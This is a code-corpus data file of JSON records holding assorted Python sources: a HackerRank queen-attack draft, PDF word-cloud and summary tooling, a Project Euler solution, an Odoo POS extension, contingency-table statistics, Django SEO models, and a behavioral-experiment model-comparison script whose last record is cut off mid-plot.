+{"seq_id":"365082858","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nimport time\n\n#n 5 x 5 board size\n#k 3 num of obstacles\n#r_q 4 row of queen\n#c_q 3 col of queen\n#obstacles array of obs r,c\n# 5 3 4 3 [[5, 5], [4, 2], [2, 3]]\n\n\n# 3,3 [4,3],[4,4],[3,4],[2,4],[2,3],[2,2],[3,2],[4,2]\n\n\n\n# Complete the queensAttack function below.\ndef queensAttack(n, k, r_q, c_q, obstacles):\n r = r_q\n c = c_q\n m = r_q - c_q\n mp = r_q + c_q\n move_count = 0\n obs = []\n #get nearest obstacles\n for x in range(k):\n if obstacles[x][0] == r_q or obstacles[x][1] == c_q or obstacles[x][0] - obstacles[x][1] == m or obstacles[x][0] + obstacles[x][1] == mp:\n obs.append(obstacles[x])\n print(obs)\n\n\n # print(obstacles[x][0])\n # if obstacles[x]\n\n # all_moves = []\n # for x in range(n):\n # coords_to_add = [[r+1+x,c],[r-1-x,c],[r+1+x,c+1+x],[r+x,c-1+x],[r+x,c+1+x],[r-1+x,c-1+x],[r-1+x,c],[r-1,c+1]]\n # print(coords_to_add)\n \n\n \n\n\n\n\nstart_time = time.time()\nqueensAttack(8,7,3,5,[[3,1], [3,7], [6,5], [5,3], [5,7], [2,4], [1,7]])\nprint(\"--- %s seconds ---\" % (time.time() - start_time))","sub_path":"hr_queen_attack_3.py","file_name":"hr_queen_attack_3.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"513578090","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Aug 08 22:56:35 2018\r\n\r\n@author: matth\r\n\"\"\"\r\n\r\nimport os\r\nimport numpy as np\r\nimport textract\r\n#from difflib import get_close_matches, SequenceMatcher\r\n#from collections import Counter\r\n#import re\r\nfrom wordcloud import WordCloud\r\nimport matplotlib.pyplot as plt\r\nimport gensim.summarization.summarizer as summ\r\nimport json\r\n\r\n#def count_close_matches(word,list_text,cutoff):\r\n# out = get_close_matches(word,list_text,1000,cutoff)\r\n# return len(out)\r\n\r\nfiles = os.listdir(\"../\")\r\n\r\nn_files = np.size(files)\r\nn = 337\r\nwhile n < n_files:\r\n \"\"\"n_files:\"\"\"\r\n \"\"\"if file[n][-3:-1]\"\"\"\r\n if files[n][-4:] == \".pdf\":\r\n print(\"\\nReadingFile: \"+files[n]+\" (\"+str(n+1)+\" of \"+str(n_files)+\")\")\r\n text = textract.process(\"../\"+files[n],\\\r\n method='tesseract',\\\r\n language='eng',\\\r\n )\r\n d_text = text.decode(\"UTF-8\",\"replace\")\r\n# l_text_1 = re.findall(r\"[\\w']+\",d_text)\r\n# l_text_2 = d_text.replace(\"\\n\",\" \")\r\n# l_text_2.replace(\".\",\" \")\r\n# l_text_2.replace(\"?\",\" \")\r\n# l_text_2 = d_text.split(\" \")\r\n# ll_text_1 = [text.lower() for text in l_text_1]\r\n# ll_text_2 = [text.lower() for text in l_text_2]\r\n \r\n wordcloud_1 = WordCloud(collocations=False,regexp=r\"\\w[\\w'-]+|[0-9]+\\s[\\w]+\").generate(d_text)\r\n file = open(\"./\"+files[n][0:-4]+\"_keywords.txt\",'w')\r\n file.write(json.dumps(wordcloud_1.words_).replace(\" \",\"\\n\"))\r\n file.close()\r\n \r\n# wordcloud_2 = WordCloud.generate(ll_text_2)\r\n \r\n fig1 = plt.figure()\r\n plt.imshow(wordcloud_1,interpolation='bilinear')\r\n plt.axis(\"off\")\r\n plt.show()\r\n fig1.savefig(\"./\"+files[n][0:-4])\r\n \r\n \r\n ss = summ.summarize(d_text,ratio=0.2)\r\n file = open(\"./\"+files[n][0 :-3]+\"txt\",'w')\r\n file.write(ss)\r\n file.close()\r\n# plt.figure()\r\n# plt.imshow(wordcloud_2,interpolation='bilinear')\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# print(type(d_text))\r\n# keywords = [\"nanomaterials\",\"biomedical\",\"spectrum\",\"x-ray\",\"gamma\",\\\r\n# \"radiation\",\"semiconductor\",\"quantum\",\"reconstruction\",\\\r\n# \"geometry\",\"spectral\",\"optogenetics\",\"erg\",\"ecog\",\"photon\",\\\r\n# \"patch-clamp\",\"electrophysiology\",\"electroretinography\",\\\r\n# \"imaging\",\"therapy\",\"diagnostic\",\"theranostic\",\"protein\",\\\r\n# \"delivery\",\"nanoparticle\",\"upconversion\",\"fluorescence\",\\\r\n# \"light\",\"visible\",\"k-edge\",\"absorption\",\"antioxidant\",\\\r\n# \"oxidative\",\"stress\",\"g-protein\",\"gpcr\",\"opsin\",\\\r\n# \"rhodopsin\",\"genetics\",\"energy\",\"scatter\",\"pulse\",\"dose\",\\\r\n# \"rf\",\"infrared\",\"nir\",\"electronics\",\"pulse-train\",\\\r\n# \"waveform\",\"electricity\",\"electron\",\"neural\",\"network\",\\\r\n# \"lightning\",\"radon\",\"particle\",\"wave\",\"microscopy\",\"field\",\\\r\n# \"mutation\",\"single-strand\",\"double-strand\",\"free\",\"radical\",\\\r\n# \"magnetic\",\"mri\",\"dti\",\"fmri\",\"detector\",\"ccd\",\"emccd\",\\\r\n# \"pmt\",\"uv\",\"ultraviolet\",\"dna\",\"eye\",\"retina\",\"genomics\",\\\r\n# \"proteomics\",\"scatter\",\"water\",\"fungi\",\"tissue\",\"single-cell\",\\\r\n# \"cell\",\"review\",\"abstract\",\"methods\",\"results\",\"conclusions\",\\\r\n# \"discussion\",\"cancer\",\"statistics\",\"machine-learning\",\\\r\n# \"aperture\",\"grating\",\"interferometry\",\"response\",\"a-wave\",\\\r\n# \"b-wave\",\"frequency\",\"damage\"]\r\n# l_m = 0\r\n# for word 
in keywords:\r\n# if len(word) > l_m:\r\n# l_m = len(word)\r\n# \r\n# \r\n# offset = l_m + 4\r\n# \r\n# for word in keywords:\r\n# num = count_close_matches(word,ll_text_2,0.85)\r\n# print(\"Instances of \"+word+\":\"+\" \"*(offset-len(word))+str(num))\r\n# \r\n# counts = Counter(l_text_l)\r\n# print(counts)\r\n \r\n n += 1\r\n \r\n","sub_path":"text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"328921843","text":"# jacob clarkson\n# project euler problem 10\n# january 2015\n\n# program to find the sum of all the prime numbers below 2 million\n\nimport math\n\n# method to check if a number is a prime number (reasonably efficient trial division method)\ndef isPrime(x):\n\tfor i in range (3, int(math.sqrt(x) + 1)):\n\t\tif x%i == 0:\n\t\t\treturn False\n\treturn True\n\nsum = 2\nfor x in range (2, 2000000):\n\tif x%2 != 0:\n\t\tif isPrime(x) == True:\n\t\t\tsum += x\n\nprint (sum)","sub_path":"Prob10.py","file_name":"Prob10.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"639344885","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# Copyright (c) 2013 BroadTech IT Solutions.\n# (http://wwww.broadtech-innovations.com)\n# contact@boradtech-innovations.com\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\nfrom openerp import models, fields\n\nfrom psycopg2.extensions import ISOLATION_LEVEL_READ_COMMITTED\nimport time\n\nclass pos_order(models.Model):\n _inherit = 'pos.order'\n \n return_order = fields.Boolean('Returned', readonly=True, help='To identify the order is returned or not!')\n \n def create(self, cr, user, vals, context=None):\n for val in vals.get('lines'):\n for key in val:\n if isinstance(key, dict):\n order_id = key.get('order_id')\n if order_id:\n refund_reference = self.browse(cr, user, order_id, context).pos_reference\n if refund_reference:\n vals.update({'pos_reference': 'Refund'+' '+refund_reference,\n 'return_order': True})\n cr._cnx.set_isolation_level(ISOLATION_LEVEL_READ_COMMITTED)\n return super(pos_order, self).create(cr, user, vals, context)\n \n def _order_fields(self, cr, uid, ui_order, context=None):\n fields = {\n 'name': ui_order['name'],\n 'user_id': ui_order['user_id'] or False,\n 'session_id': ui_order['pos_session_id'],\n 'lines': ui_order['lines'],\n 'pos_reference':ui_order['name'],\n 'partner_id': ui_order['partner_id'] or False,\n }\n if ui_order['return_status'] == 'active':\n fields.update({'return_order': ui_order['return_order']})\n return fields\n \n def create_from_ui(self, cr, uid, orders, context=None):\n # Keep only new orders\n submitted_references = [o['data']['name'] for o in orders]\n existing_order_ids = self.search(cr, uid, [('pos_reference', 'in', submitted_references)], context=context)\n existing_orders = self.read(cr, uid, existing_order_ids, ['pos_reference'], context=context)\n existing_references = set([o['pos_reference'] for o in existing_orders])\n orders_to_save = [o for o in orders if o['data']['name'] not in existing_references]\n\n order_ids = []\n\n for tmp_order in orders_to_save:\n to_invoice = tmp_order['to_invoice']\n order = tmp_order['data']\n if order['return_status'] == 'active':\n order.update({'return_order': True})\n order_id = self._process_order(cr, uid, order, context=context)\n order_ids.append(order_id)\n\n try:\n self.signal_workflow(cr, uid, [order_id], 'paid')\n except Exception as e:\n _logger.error('Could not fully process the POS Order: %s', tools.ustr(e))\n\n if to_invoice:\n self.action_invoice(cr, uid, [order_id], context)\n order_obj = self.browse(cr, uid, order_id, context)\n self.pool['account.invoice'].signal_workflow(cr, uid, [order_obj.invoice_id.id], 'invoice_open')\n\n return order_ids\n \npos_order()\n\n# 
vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"humanytek_pos/point_of_sale.py","file_name":"point_of_sale.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"353198543","text":"#!/usr/bin/python\n# coding: latin-1\nimport numpy as np\nimport scipy.stats.distributions as distributions\n\n\"\"\"\n CONTINGENCY TABLE ANALYSIS (CTA)\n\n Test of the association between em2D and RMSD using CTA (Num. Rec. 2007, sec. 14.4)\n\"\"\"\n\n\ndef cta_chi_square(X,Y,bins):\n \"\"\"\n Contingency Table Analysis\n Measure of the association of variables X and Y with the chi-square\n statistic. Num. Rec. 14.4.1\n bins - the number of bins to form for the association test\n output - The p-value of the chi-square test\n \"\"\"\n epsilon = 1e-5\n if(len(X) != len(Y)):\n raise ValueError(\"X and Y must have the same number of elements\")\n # Bin the variables:\n # Contingency table (histogram2d)\n CT, xedges, yedges = np.histogram2d(X, Y, bins=bins)\n# print CT\n Nx = np.sum(CT, axis = 1)\n Ny = np.sum(CT, axis = 0)\n N = np.sum(CT)\n \n X2 = 0\n for i in np.arange(0,bins): # X\n for j in np.arange(0,bins): # Y\n # print \"i,j\",i,j\n if(Nx[i] == 0 or Ny[j] == 0):\n continue # ignore empty bins\n nij = 1.0* Nx[i] * Ny[j] / N\n X2 += 1.0 * ( (CT[i][j] - nij)**2 ) / nij\n deg = bins*bins-bins-bins+1 # Degrees of freedom\n chi2 = distributions.chi2\n Q = 1-chi2.cdf(X2, deg)\n return Q\n\n\ndef mutual_information(X, Y, bins):\n \"\"\"\n Mutual information between X and Y sets of values. The values are\n tabulated in a table of bins x bins size.\n \"\"\"\n epsilon = 1e-5\n if(len(X) != len(Y)):\n raise ValueError(\"X and Y must have the same number of elements\")\n # Contingency table (histogram2d)\n CT, xedges, yedges = np.histogram2d(X, Y, bins=bins)\n Nx = np.sum(CT, axis = 1)\n Ny = np.sum(CT, axis = 0)\n N = np.sum(CT)\n \n # Mutual information\n I = 0\n Px = Nx/(N*1.0)\n Py = Ny/(N*1.0)\n for i in np.arange(0,bins): # X\n for j in np.arange(0,bins): # Y\n pij = 1.0 * CT[i][j]/N\n if(pij < epsilon): continue\n I += pij * np.log(pij/ (Px[i] * Py[j]) )\n return I\n \ndef uncertainty_coefficient(X, Y, bins):\n \"\"\"\n Uncertainty coefficient of Y respect to X\n 0 - no relationship\n 1 - perfect relationship\n \"\"\"\n epsilon = 1e-5\n if(len(X) != len(Y)):\n raise ValueError(\"X and Y must have the same number of elements\")\n # Bin the variables:\n # Contingency table (histogram2d)\n CT, xedges, yedges = np.histogram2d(X, Y, bins=bins)\n# print CT\n Nx = np.sum(CT, axis = 1)\n Ny = np.sum(CT, axis = 0)\n N = np.sum(CT)\n \n I = mutual_information(X, Y, bins)\n # entropy of Y given X\n Px = Nx/(N*1.0)\n Py = Ny/(N*1.0)\n Hyx =0.0\n for i in np.arange(0,bins): # X\n for j in np.arange(0,bins): # Y\n pij = 1.0 * CT[i][j]/N\n if(pij < epsilon): continue\n Hyx += pij * np.log(pij/Px[i] )\n Hyx = -1 * Hyx \n # entropy of Y \n Hy = (-1.) * np.sum([p*np.log(p) for p in Py if p> epsilon]) \n return (Hy-Hyx)/Hy\n \n","sub_path":"math/mutual_information.py","file_name":"mutual_information.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"18071867","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.db import models\r\nfrom django.utils.translation import ugettext_lazy as _\r\nfrom django.contrib.contenttypes import generic\r\nfrom django.contrib.contenttypes.models import ContentType\r\n\r\nclass Seo(models.Model):\r\n class Meta:\r\n verbose_name = _('SEO fields')\r\n verbose_name_plural = _('SEO fields')\r\n unique_together = ((\"content_type\", \"object_id\"),)\r\n\r\n title = models.CharField(verbose_name=_('Title'),\r\n max_length=200, default='', blank=True)\r\n description = models.CharField(verbose_name=_('Description'),\r\n max_length=200, default='', blank=True)\r\n keywords = models.CharField(verbose_name=_('Keywords'),\r\n max_length=1000, default='', blank=True)\r\n\r\n content_type = models.ForeignKey(ContentType)\r\n object_id = models.PositiveIntegerField()\r\n content_object = generic.GenericForeignKey('content_type', 'object_id')\r\n\r\n def __unicode__(self):\r\n return self.title\r\n\r\nclass Url(models.Model):\r\n class Meta:\r\n verbose_name = _('URL')\r\n verbose_name_plural = _('URLs')\r\n\r\n url = models.CharField(verbose_name=_('URL'),\r\n max_length=200, default='/', unique=True,\r\n help_text=_(\"This should be an absolute path, excluding the domain name. Example: '/events/search/'.\"))\r\n\r\n def get_absolute_url(self):\r\n return self.url\r\n\r\n def __unicode__(self):\r\n return self.url\r\n","sub_path":"virtual/lib/python3.6/site-packages/seo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"532424213","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import pylab\nimport pandas as pd\nimport seaborn as sns\nimport warnings\nimport pickle\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport scipy\n\n\n# Suppress runtimewarning due to pandas bug\nwarnings.simplefilter(action = \"ignore\", category = RuntimeWarning)\n\n# *********************************************\n# Set up defaults\n# *********************************************\nplot = False\nsave = False\nprint_diagnoistic = True\n\n# *********************************************\n# Load Data\n# ********************************************\ndata_dir = os.path.expanduser('~')\nbias2_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/bias2_parameter_fits.pkl', 'rb'))\nbias1_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/bias1_parameter_fits.pkl', 'rb'))\neoptimal_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/eoptimal_parameter_fits.pkl', 'rb'))\nignore_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/ignore_parameter_fits.pkl', 'rb'))\nmidline_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/midline_parameter_fits.pkl', 'rb'))\nswitch_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/switch_parameter_fits.pkl', 'rb'))\nmemory_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/memory_parameter_fits.pkl', 'rb'))\nperseverance_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/perseverance_parameter_fits.pkl', 'rb'))\npermem_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/permem_parameter_fits.pkl', 'rb'))\n\ngtrain_df = pd.read_pickle('../../Analysis/Analysis_Output/gtrain_df.pkl')\ngtrain_learn_df = pd.read_pickle('../../Analysis/Analysis_Output/gtrain_learn_df.pkl')\ngtest_learn_df = pd.read_pickle('../../Analysis/Analysis_Output/gtest_learn_df.pkl')\ngtest_conform_df = pd.read_pickle('../../Analysis/Analysis_Output/gtest_conform_df.pkl')\ngtest_df = pd.read_pickle('../../Analysis/Analysis_Output/gtest_df.pkl')\ngtrain_learn_df.id = gtrain_learn_df.id.astype('str').apply(lambda x: x.zfill(3))\ngtest_learn_df.id = gtest_learn_df.id.astype('str').apply(lambda x: x.zfill(3))\n\n\n# *********************************************\n# Select Dataset\n# ********************************************* \nmodel = 'TS'\ndf = gtest_df.copy()\nif 'midline_posterior' in df.columns:\n df.drop(['midline_posterior','midline_posterior_cross'], axis = 1, inplace = True)\n\n# *********************************************\n# Additional Variables\n# ********************************************* \nfor models in ['bias2','bias1','eoptimal', 'ignore', 'switch','memory','perseverance','permem']:\n df[models + '_choice'] = (df[models + '_posterior']>.5).astype(int)\n df[models + '_certainty'] = (abs(df[models + '_posterior']-.5))/.5\n\nswitch_sums = []\ntrials_since_switch = 0\nfor i,row in df.iterrows():\n if row['switch'] == 1 or pd.isnull(row['switch']):\n trials_since_switch = 0\n else:\n trials_since_switch += 1\n switch_sums.append(trials_since_switch)\ndf['trials_since_switch'] = switch_sums\n\n\n# *********************************************\n# Selection Criterion\n# ********************************************* \n## Exclude subjects based on behavioral criteria\nselect_ids = gtest_df.groupby('id').mean().stim_conform>.75\nselect_ids = list(select_ids[select_ids].index)\nutter_failures = df.query('id not in %s' % select_ids)\ndf = df.query('id in %s' % 
select_ids)\n\n\n\ngroup_means = df.groupby('id')['correct'].mean() \nk = range(1,10)\nk_error = []\nfor k_i in k: \n c,label = scipy.cluster.vq.kmeans2(group_means,k_i)\n k_error.append(np.sum(np.power([c[i] for i in label]-group_means,2)))\n\n#exclude subjects based on percent correct\nx = df.groupby('id')['correct'].mean() \nc,label = scipy.cluster.vq.kmeans2(group_means,np.array([.49,.51]))\n\n\n\n# *********************************************\n# Model Comparison\n# ********************************************* \ncompare_df = df\ncompare_df_subset = compare_df.filter(regex = 'subj_ts|.*posterior_cross$')\nmodel_subj_compare = compare_df_subset.corr()\n\nlog_posteriors = pd.DataFrame()\nfor model in compare_df_subset.columns[1:]:\n log_posteriors[model] = np.log(abs(compare_df_subset.subj_ts-(1-compare_df_subset[model])))\n\n\ncompare_df = pd.concat([compare_df[['id','subj_ts','context']], log_posteriors], axis = 1)\ncompare_df['random_log'] = np.log(.5)\n\nsummary = compare_df.groupby('id').sum().drop(['context','subj_ts'],axis = 1)\n\nnum_params = [3,2,1,1,3,3,4,1,0]\nparam_cost_df = np.log(df.groupby('id').count()).iloc[:,0:len(summary.columns)]*num_params\nparam_cost_df.columns = summary.columns\nBIC_summary = -2*summary + param_cost_df\n\n#extract column of best model\nmin_col = BIC_summary.idxmin(1)\nbest_models = min_col.map(lambda x: x[:x.find('_')])\nbayes_models = [i in ['bias2', 'bias1', 'ignore', 'eoptimal'] for i in best_models]\nmem_models = [i in ['memory', 'perseverance','permem'] for i in best_models]\n\nbest_posterior = []\nfor i in range(len(best_models)):\n subj_id = best_models.index[i]\n model = best_models[i]\n subj_df = df.query('id == \"%s\"' % subj_id)\n if model == 'random':\n best_posterior += [.5]*len(subj_df)\n else:\n best_posterior += list(subj_df[model + '_posterior'])\n \ndf['best_posterior'] = best_posterior\ndf['best_choice'] = (df['best_posterior']>.5).astype(int)\ndf['best_certainty'] = (abs(df['best_posterior']-.5))/.5\n\nall_df = df.copy()\nids = np.unique(df['id'])\nselect_ids = list(ids[label==1])\ndf_nonlearners = df.query('id not in %s' % select_ids)\ndf = df.query('id in %s' % select_ids)\n\n# *********************************************\n# Behavioral Analysis\n# ********************************************* \n#train analysis\ngtrain_df.loc[:,'last_FB'] = gtrain_df['FB'].shift()\ngtrain_df.loc[:,'last_choice'] = gtrain_df['subj_ts'].shift()\ngtrain_df.loc[df.index == 0,['last_FB','last_choice']] = np.nan\n\nparams = []\npvals = []\nformula = 'subj_ts ~ context + last_choice * last_FB'\ndelays = list(range(26))\nfor i in delays[1:]:\n formula += ' + context.shift(%s)' % i\nfor i in np.unique(df['id']):\n res = smf.glm(formula = formula, data = gtrain_df.query('id == \"%s\"' %i), family = sm.families.Binomial()).fit()\n params.append(res.params[1:]) \n pvals.append(res.pvalues[1:])\n\n\n#effect of last TS\ndf[['last_TS', 'bias2_last_choice']] = df[['subj_ts', 'bias2_choice']].shift(1)\ndf.loc[0,['last_TS','bias2_last_choice']]=np.nan\nformula = 'subj_ts ~ context'\ndelays = list(range(26))\nfor i in delays[1:]:\n formula += ' + context.shift(%s)' % i\n\n\nlearner_params = []\nfor i in np.unique(df['id']):\n res = smf.glm(formula = formula, data = df.query('id == \"%s\"' %i), family = sm.families.Binomial()).fit()\n learner_params.append(res.params[1:])\nlearner_params = pd.DataFrame(learner_params).mean()\n\nselect_ids = abs(df_nonlearners.groupby('id').subj_ts.mean()-.5)<.475\nselect_ids = list(select_ids[select_ids].index)\ndf_fail = 
df_nonlearners.query('id in %s' % select_ids)\nnonlearner_params = []\nfor i in np.unique(df_fail['id']):\n res = smf.glm(formula = formula, data = df_fail.query('id == \"%s\"' %i), family = sm.families.Binomial()).fit()\n nonlearner_params.append(res.params[1:])\nnonlearner_params = pd.DataFrame(nonlearner_params).mean()\n\n# *********************************************\n# Print Diagnostics\n# *********************************************\n\nif print_diagnoistic == True:\n for i in all_df.id.unique():\n id_df = all_df[all_df['id'] == i]\n if i in df.id.unique():\n print(i, 'learner, best: ', best_models.loc[i])\n else:\n print(i, 'nonlearner, best: ', best_models.loc[i])\n print('Pereseverance:', np.corrcoef(id_df.subj_ts,id_df.perseverance_choice)[1,0]) \n print('bias2:', np.corrcoef(id_df.subj_ts,id_df.bias2_choice)[1,0])\n print('bias1:', np.corrcoef(id_df.subj_ts,id_df.bias1_choice)[1,0]) \n print('')\n\n\n# *********************************************\n# Plotting\n# *********************************************\n\nif plot == True:\n contexts = np.unique(gtest_df.context)\n figdims = (16,12)\n fontsize = 20\n \n # ***************************\n # Plots for Learners - only using bayesian models\n # ***************************\n plot_df = df.copy()\n plot_df['rt'] = plot_df['rt']*1000\n plot_ids = np.unique(plot_df.id)\n \n # Plot task-set count by context value\n sns.set_style(\"darkgrid\", {\"axes.linewidth\": \"1.25\", \"axes.edgecolor\": \".15\"})\n p1 = plt.figure(figsize = figdims)\n plt.hold(True) \n plt.plot(plot_df.groupby('context').subj_ts.mean(), lw = 4, marker = 'o', markersize = 10, color = 'm', label = 'subject')\n plt.plot(plot_df.groupby('context').bias2_choice.mean(), lw = 4, marker = 'o', markersize = 10, color = 'c', label = 'bias-2 observer')\n plt.plot(plot_df.groupby('context').bias1_choice.mean(), lw = 4, marker = 'o', markersize = 10, color = 'c', ls = '--', label = 'bias-1 observer')\n plt.xticks(list(range(12)),contexts)\n plt.xlabel('Stimulus Vertical Position', size = fontsize)\n plt.ylabel('TS2 choice %', size = fontsize)\n pylab.legend(loc='best',prop={'size':20})\n for subj in plot_ids:\n subj_df = plot_df.query('id == \"%s\"' %subj)\n if subj_df.correct.mean() < .55:\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, color = 'r', alpha = .2)\n else:\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, color = 'k', alpha = .2)\n a = plt.axes([.62, .15, .3, .3])\n plt.plot(plot_df.groupby('context').subj_ts.mean(), lw = 4, marker = 'o', markersize = 10, color = 'm', label = 'subject')\n plt.plot(plot_df.groupby('context').eoptimal_choice.mean(), lw = 4, marker = 'o', markersize = 10, color = 'c', ls = '--', label = r'$\\epsilon$-optimal observer')\n plt.tick_params(\n axis = 'both',\n which = 'both',\n labelleft = 'off',\n labelbottom = 'off')\n pylab.legend(loc='upper left',prop={'size':14})\n \n\n # Plot task-set count by context value\n range_start = 0\n range_length = 7\n p2 = plt.figure(figsize = figdims)\n plt.hold(True) \n plt.xticks(list(range(12)),contexts)\n plt.xlabel('Stimulus Vertical Position', size = fontsize)\n plt.ylabel('TS2 choice %', size = fontsize)\n subj_df = plot_df.query('id == \"%s\"' %plot_ids[range_start])\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, alpha = 1, label = 'subject')\n for subj in plot_ids[range_start+1:range_start+range_length]:\n subj_df = plot_df.query('id == \"%s\"' %subj)\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, alpha = 1, label = '_nolegend_')\n 
plt.gca().set_color_cycle(None)\n subj_df = plot_df.query('id == \"%s\"' %plot_ids[range_start])\n plt.plot(subj_df.groupby('context').bias2_choice.mean(), lw = 2, ls = '--', label = 'bias-2 observer')\n for subj in plot_ids[range_start+1:range_start+range_length]:\n subj_df = plot_df.query('id == \"%s\"' %subj)\n plt.plot(subj_df.groupby('context').bias2_choice.mean(), lw = 2, ls = '--', label = '_nolegend_')\n pylab.legend(loc='best',prop={'size':20})\n\n \n # Plot rt against bias2 model posterior\n sns.set_context('poster')\n subj_df = plot_df.query('rt > 100 & id < \"%s\"' %plot_ids[4]) \n p3 = sns.lmplot(x='bias2_posterior',y='rt', hue = 'id', data = subj_df, order = 2, size = 6, col = 'id')\n p3.set_xlabels(\"P(TS2)\", size = fontsize)\n p3.set_ylabels('Reaction time (ms)', size = fontsize)\n p3.set_xticklabels(['',0,.2,.4,.6,.8,1,''])\n \n # Plot rt against bias2 model certainty\n # Take out RT < 100 ms \n sns.set_context('poster')\n subj_df = plot_df.query('rt > 100 & id < \"%s\"' %plot_ids[3]) \n p4 = sns.lmplot(x ='bias2_certainty', y = 'rt', hue = 'id', col = 'id', size = 6, data = subj_df) \n p4.set_xlabels(\"Model Confidence\", size = fontsize)\n p4.set_ylabels('Reaction time (ms)', size = fontsize)\n p4.set_xticklabels(['',0,.2,.4,.6,.8,1,''])\n \n p5 = sns.lmplot(x ='bias2_certainty', y = 'rt', hue = 'id', ci = None, legend = False, size = figdims[1], data = plot_df.query('rt>100')) \n plt.xlim(-.1,1.1)\n p5.set_xlabels(\"Model Confidence\", size = fontsize)\n p5.set_ylabels('Reaction time (ms)', size = fontsize)\n \n \n # plot bias2 parameters\n params_df = pd.DataFrame()\n params_df['id'] = [x[1:3] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df['learner'] = [x[0:3] in plot_ids for x in bias2_fit_dict if ('_fullRun' in x)] \n params_df['r1'] = [bias2_fit_dict[x]['r1'] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df['r2'] = [bias2_fit_dict[x]['r2'] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df['eps'] = [bias2_fit_dict[x]['TS_eps'] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df = pd.melt(params_df, id_vars = ['id','learner'], value_vars = ['eps','r1','r2'], var_name = 'param', value_name = 'val')\n\n p6 = plt.figure(figsize = figdims)\n ax = plt.subplot(111)\n box_palette = sns.color_palette(['m','c'], desat = 1)\n sns.boxplot(x = 'param', y = 'val', hue = 'learner', hue_order = [1,0], data = params_df, palette = box_palette)\n plt.xlabel(\"Parameter\", size = fontsize)\n plt.ylabel('Value', size = fontsize)\n plt.title('Bias-2 Model Parameter Fits', size = fontsize+4, y = 1.05)\n plt.xticks([0,1,2], ('$\\epsilon$','$r_1$','$r_2$'), size = fontsize)\n ax.legend(ax.get_legend_handles_labels()[0],['Learners','Non-learners'], loc = 'upper left')\n \n \n\n #look at models\n p7 = plt.figure(figsize = figdims)\n plt.hold(True)\n for c in log_posteriors.columns[:-1]:\n sns.kdeplot(summary[c])\n \n p8 = plt.figure(figsize = figdims)\n sns.heatmap(model_subj_compare)\n p9 = plt.figure(figsize = figdims)\n sns.heatmap(model_subj_compare.filter(regex='bias|eoptimal|ignore|subj_ts').corr())\n \n #********** Behavioral Plots **************************\n # look at RT\n p10 = plt.figure(figsize = figdims)\n plt.subplot(4,1,1)\n plot_df.rt.hist(bins = 25)\n plt.ylabel('Frequency', size = fontsize)\n \n plt.subplot(4,1,2) \n plt.hold(True)\n sns.kdeplot(plot_df.query('subj_switch == 0')['rt'],color = 'm', lw = 5, label = 'stay')\n sns.kdeplot(plot_df.query('subj_switch == 1')['rt'],color = 'c', lw = 5, label = 'switch')\n plot_df.query('subj_switch 
== 0')['rt'].hist(bins = 25, alpha = .4, color = 'm', normed = True)\n plot_df.query('subj_switch == 1')['rt'].hist(bins = 25, alpha = .4, color = 'c', normed = True)\n pylab.legend(loc='upper right',prop={'size':20})\n plt.xlim(xmin=0)\n\n \n plt.subplot(4,1,3)\n plt.hold(True)\n sns.kdeplot(plot_df.query('subj_switch == 0 and rep_resp == 1')['rt'], color = 'm', lw = 5, label = 'repeat response')\n sns.kdeplot(plot_df.query('subj_switch == 0 and rep_resp == 0')['rt'], color = 'c', lw = 5, label = 'change response (within task-set)')\n plot_df.query('subj_switch == 0 and rep_resp == 1')['rt'].hist(bins = 25, alpha = .4, color = 'm', normed = True)\n plot_df.query('subj_switch == 0 and rep_resp == 0')['rt'].hist(bins = 25, alpha = .4, color = 'c', normed = True)\n plt.ylabel('Probability Density', size = fontsize)\n pylab.legend(loc='upper right',prop={'size':20})\n plt.xlim(xmin=0)\n\n \n plt.subplot(4,1,4)\n plt.hold(True)\n 